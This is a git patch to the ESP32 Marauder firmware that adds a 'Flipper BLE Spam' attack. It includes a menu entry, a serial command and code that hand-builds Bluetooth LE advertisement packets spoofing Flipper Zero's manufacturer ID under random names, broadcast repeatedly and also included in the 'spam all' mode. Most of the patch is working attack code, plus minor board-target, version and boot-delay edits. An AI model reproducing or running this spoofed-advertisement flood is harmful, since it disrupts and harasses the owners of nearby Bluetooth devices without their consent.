From 9b59b7f8c06ad7d812ec6228348db2e1eeeadc37 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Wed, 13 Nov 2024 17:34:41 -0500 Subject: [PATCH] Add flipper ble spam --- esp32_marauder/CommandLine.cpp | 12 +++++ esp32_marauder/CommandLine.h | 2 +- esp32_marauder/GpsInterface.cpp | 2 +- esp32_marauder/LedInterface.cpp | 2 +- esp32_marauder/MenuFunctions.cpp | 9 +++- esp32_marauder/WiFiScan.cpp | 76 ++++++++++++++++++++++++++++++- esp32_marauder/WiFiScan.h | 5 +- esp32_marauder/configs.h | 6 +-- esp32_marauder/esp32_marauder.ino | 52 ++++++++++----------- 9 files changed, 130 insertions(+), 36 deletions(-) diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp index 74355e5..9d69730 100644 --- a/esp32_marauder/CommandLine.cpp +++ b/esp32_marauder/CommandLine.cpp @@ -909,6 +909,18 @@ void CommandLine::runCommand(String input) { Serial.println("Bluetooth not supported"); #endif } + else if (bt_type == "flipper") { + #ifdef HAS_BT + Serial.println("Starting Flipper Spam attack. Stop with " + (String)STOPSCAN_CMD); + #ifdef HAS_SCREEN + display_obj.clearScreen(); + menu_function_obj.drawStatusBar(); + #endif + wifi_scan_obj.StartScan(BT_ATTACK_FLIPPER_SPAM, TFT_ORANGE); + #else + Serial.println("Bluetooth not supported"); + #endif + } else if (bt_type == "all") { #ifdef HAS_BT Serial.println("Starting BT Spam All attack. Stop with " + (String)STOPSCAN_CMD); diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h index c6be7e0..da0698f 100644 --- a/esp32_marauder/CommandLine.h +++ b/esp32_marauder/CommandLine.h @@ -135,7 +135,7 @@ const char PROGMEM HELP_LOAD_CMD[] = "load -a/-s"; // Bluetooth sniff/scan const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt"; -const char PROGMEM HELP_BT_SPAM_CMD[] = "blespam -t "; +const char PROGMEM HELP_BT_SPAM_CMD[] = "blespam -t "; //const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple"; //const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; //const char PROGMEM HELP_BT_SAMSUNG_SPAM_CMD[] = "samsungblespam"; diff --git a/esp32_marauder/GpsInterface.cpp b/esp32_marauder/GpsInterface.cpp index 370c37f..131253d 100644 --- a/esp32_marauder/GpsInterface.cpp +++ b/esp32_marauder/GpsInterface.cpp @@ -32,7 +32,7 @@ void GpsInterface::begin() { MicroNMEA::sendSentence(Serial2, "$PSTMSRR"); - delay(3900); + delay(1900); if (Serial2.available()) { Serial.println("GPS Attached Successfully"); diff --git a/esp32_marauder/LedInterface.cpp b/esp32_marauder/LedInterface.cpp index be97b66..bff8864 100644 --- a/esp32_marauder/LedInterface.cpp +++ b/esp32_marauder/LedInterface.cpp @@ -10,7 +10,7 @@ void LedInterface::RunSetup() { strip.begin(); strip.setPixelColor(0, strip.Color(0, 0, 0)); strip.show(); - delay(100); + //delay(100); strip.setBrightness(50); strip.setPixelColor(0, strip.Color(0, 0, 0)); strip.show(); diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index ba4b8b9..e20284f 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp @@ -590,6 +590,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SPAM_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS)) @@ -654,6 +655,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SPAM_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) || @@ -1879,7 +1881,12 @@ void MenuFunctions::RunSetup() this->addNodes(&bluetoothAttackMenu, "Google BLE Spam", TFT_PURPLE, NULL, LANGUAGE, [this]() { display_obj.clearScreen(); this->drawStatusBar(); - wifi_scan_obj.StartScan(BT_ATTACK_GOOGLE_SPAM, TFT_RED); + wifi_scan_obj.StartScan(BT_ATTACK_GOOGLE_SPAM, TFT_PURPLE); + }); + this->addNodes(&bluetoothAttackMenu, "Flipper BLE Spam", TFT_ORANGE, NULL, LANGUAGE, [this]() { + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_ATTACK_FLIPPER_SPAM, TFT_ORANGE); }); this->addNodes(&bluetoothAttackMenu, "BLE Spam All", TFT_MAGENTA, NULL, DEAUTH_SNIFF, [this]() { display_obj.clearScreen(); diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index 148ccf7..4fb80ee 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -126,6 +126,55 @@ extern "C" { AdvData.addData(std::string((char *)AdvData_Raw, 14)); break; } + case FlipperZero: { + // Generate a random 5-letter name for the advertisement + char Name[6]; // 5 characters + null terminator + generateRandomName(Name, sizeof(Name)); + + uint8_t name_len = strlen(Name); + + // Allocate space for the full Advertisement Data section based on the hex dump + AdvData_Raw = new uint8_t[31]; // Adjusted to the specific length of the data in the dump + + // Advertisement Data from the hex dump + AdvData_Raw[i++] = 0x02; // Flags length + AdvData_Raw[i++] = 0x01; // Flags type + AdvData_Raw[i++] = 0x06; // Flags value + + AdvData_Raw[i++] = 0x06; // Name length (5 + type) + AdvData_Raw[i++] = 0x09; // Complete Local Name type + + // Add the randomized 5-letter name + memcpy(&AdvData_Raw[i], Name, name_len); + i += name_len; + + AdvData_Raw[i++] = 0x03; // Incomplete List of 16-bit Service UUIDs length + AdvData_Raw[i++] = 0x02; // Incomplete List of 16-bit Service UUIDs type + AdvData_Raw[i++] = 0x81; // Service UUID (part of hex dump) + AdvData_Raw[i++] = 0x30; + + AdvData_Raw[i++] = 0x02; // TX Power level length + AdvData_Raw[i++] = 0x0A; // TX Power level type + AdvData_Raw[i++] = 0x00; // TX Power level value + + // Manufacturer specific data based on your hex dump + AdvData_Raw[i++] = 0x05; // Length of Manufacturer Specific Data section + AdvData_Raw[i++] = 0xFF; // Manufacturer Specific Data type + AdvData_Raw[i++] = 0xBA; // LSB of Manufacturer ID (Flipper Zero: 0x0FBA) + AdvData_Raw[i++] = 0x0F; // MSB of Manufacturer ID + + AdvData_Raw[i++] = 0x4C; // Example data (remaining as in your dump) + AdvData_Raw[i++] = 0x75; + AdvData_Raw[i++] = 0x67; + AdvData_Raw[i++] = 0x26; + AdvData_Raw[i++] = 0xE1; + AdvData_Raw[i++] = 0x80; + + // Add the constructed Advertisement Data to the BLE advertisement + AdvData.addData(std::string((char *)AdvData_Raw, i)); + + break; + } default: { Serial.println("Please Provide a Company Type"); break; @@ -578,7 +627,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) else if ((scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) || (scan_mode == BT_ATTACK_SPAM_ALL) || (scan_mode == BT_ATTACK_SAMSUNG_SPAM) || - (scan_mode == BT_ATTACK_GOOGLE_SPAM)) { + (scan_mode == BT_ATTACK_GOOGLE_SPAM) || + (scan_mode == BT_ATTACK_FLIPPER_SPAM)) { #ifdef HAS_BT RunSwiftpairSpam(scan_mode, color); #endif @@ -764,6 +814,7 @@ void WiFiScan::StopScan(uint8_t scan_mode) (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (currentScanMode == BT_SCAN_WAR_DRIVE) || (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (currentScanMode == BT_SCAN_SKIMMERS)) @@ -1890,6 +1941,19 @@ void WiFiScan::executeSourApple() { #endif } +void WiFiScan::generateRandomName(char *name, size_t length) { + static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz"; + + // Generate the first character as uppercase + name[0] = 'A' + (rand() % 26); + + // Generate the remaining characters as lowercase + for (size_t i = 1; i < length - 1; ++i) { + name[i] = alphabet[rand() % (sizeof(alphabet) - 1)]; + } + name[length - 1] = '\0'; // Null-terminate the string +} + const char* WiFiScan::generateRandomName() { const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; int len = rand() % 10 + 1; // Generate a random length between 1 and 10 @@ -2321,6 +2385,8 @@ void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) { display_obj.tft.drawCentreString("BLE Spam Samsung",120,16,2); else if (scan_mode == BT_ATTACK_GOOGLE_SPAM) display_obj.tft.drawCentreString("BLE Spam Google",120,16,2); + else if (scan_mode == BT_ATTACK_FLIPPER_SPAM) + display_obj.tft.drawCentreString("BLE Spam Flipper", 120, 16, 2); display_obj.touchToExit(); #endif display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); @@ -4666,7 +4732,8 @@ void WiFiScan::main(uint32_t currentTime) (currentScanMode == BT_ATTACK_SOUR_APPLE) || (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || - (currentScanMode == BT_ATTACK_GOOGLE_SPAM)) { + (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (currentScanMode == BT_ATTACK_FLIPPER_SPAM)) { #ifdef HAS_BT if (currentTime - initTime >= 1000) { initTime = millis(); @@ -4693,10 +4760,15 @@ void WiFiScan::main(uint32_t currentTime) if ((currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSwiftpairSpam(Microsoft); + //this->executeSwiftpairSpam(FlipperZero); if ((currentScanMode == BT_ATTACK_SOUR_APPLE) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSourApple(); + + if ((currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (currentScanMode == BT_ATTACK_SPAM_ALL)) + this->executeSwiftpairSpam(FlipperZero); #endif } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 5b5ec60..eb7740a 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -92,6 +92,7 @@ #define BT_ATTACK_SAMSUNG_SPAM 39 #define WIFI_SCAN_GPS_NMEA 40 #define BT_ATTACK_GOOGLE_SPAM 41 +#define BT_ATTACK_FLIPPER_SPAM 42 #define GRAPH_REFRESH 100 @@ -262,7 +263,8 @@ class WiFiScan Microsoft, Apple, Samsung, - Google + Google, + FlipperZero }; #ifdef HAS_BT @@ -294,6 +296,7 @@ class WiFiScan void executeSwiftpairSpam(EBLEPayloadType type); void startWardriverWiFi(); void generateRandomMac(uint8_t* mac); + void generateRandomName(char *name, size_t length); void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 87b0440..a752223 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h @@ -8,9 +8,9 @@ //// BOARD TARGETS //#define MARAUDER_M5STICKC - //#define MARAUDER_MINI + #define MARAUDER_MINI //#define MARAUDER_V4 - #define MARAUDER_V6 + //#define MARAUDER_V6 //#define MARAUDER_V6_1 //#define MARAUDER_KIT //#define GENERIC_ESP32 @@ -21,7 +21,7 @@ //#define MARAUDER_REV_FEATHER //// END BOARD TARGETS - #define MARAUDER_VERSION "v1.0.0" + #define MARAUDER_VERSION "v1.1.0" //// HARDWARE NAMES #ifdef MARAUDER_M5STICKC diff --git a/esp32_marauder/esp32_marauder.ino b/esp32_marauder/esp32_marauder.ino index ac6ae81..d9356c0 100644 --- a/esp32_marauder/esp32_marauder.ino +++ b/esp32_marauder/esp32_marauder.ino @@ -212,7 +212,7 @@ void setup() backlightOn(); // Need this #ifdef HAS_SCREEN - delay(2000); + //delay(2000); // Do some stealth mode stuff #ifdef HAS_BUTTONS @@ -225,40 +225,40 @@ void setup() } #endif - display_obj.clearScreen(); + //display_obj.clearScreen(); - display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); + //display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); - display_obj.tft.println(text_table0[0]); + //display_obj.tft.println(text_table0[0]); - delay(2000); + //delay(2000); - display_obj.tft.println("Marauder " + display_obj.version_number + "\n"); + //display_obj.tft.println("Marauder " + display_obj.version_number + "\n"); - display_obj.tft.println(text_table0[1]); + //display_obj.tft.println(text_table0[1]); #endif settings_obj.begin(); wifi_scan_obj.RunSetup(); - #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[2])); - #endif + //#ifdef HAS_SCREEN + // display_obj.tft.println(F(text_table0[2])); + //#endif buffer_obj = Buffer(); #if defined(HAS_SD) // Do some SD stuff if(sd_obj.initSD()) { #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[3])); + //display_obj.tft.println(F(text_table0[3])); #endif } else { Serial.println(F("SD Card NOT Supported")); #ifdef HAS_SCREEN - display_obj.tft.setTextColor(TFT_RED, TFT_BLACK); - display_obj.tft.println(F(text_table0[4])); - display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); + //display_obj.tft.setTextColor(TFT_RED, TFT_BLACK); + //display_obj.tft.println(F(text_table0[4])); + //display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); #endif } #endif @@ -270,11 +270,11 @@ void setup() #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[5])); + //display_obj.tft.println(F(text_table0[5])); #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[6])); + //display_obj.tft.println(F(text_table0[6])); #endif #ifdef HAS_BATTERY @@ -293,27 +293,27 @@ void setup() #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[7])); + //display_obj.tft.println(F(text_table0[7])); - delay(500); + //delay(500); #endif #ifdef HAS_GPS gps_obj.begin(); - #ifdef HAS_SCREEN - if (gps_obj.getGpsModuleStatus()) - display_obj.tft.println("GPS Module connected"); - else - display_obj.tft.println("GPS Module NOT connected"); - #endif + //#ifdef HAS_SCREEN + //if (gps_obj.getGpsModuleStatus()) + //display_obj.tft.println("GPS Module connected"); + //else + //display_obj.tft.println("GPS Module NOT connected"); + //#endif #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[8])); + //display_obj.tft.println(F(text_table0[8])); display_obj.tft.setTextColor(TFT_WHITE, TFT_BLACK); - delay(2000); + //delay(2000); #endif #ifdef HAS_SCREEN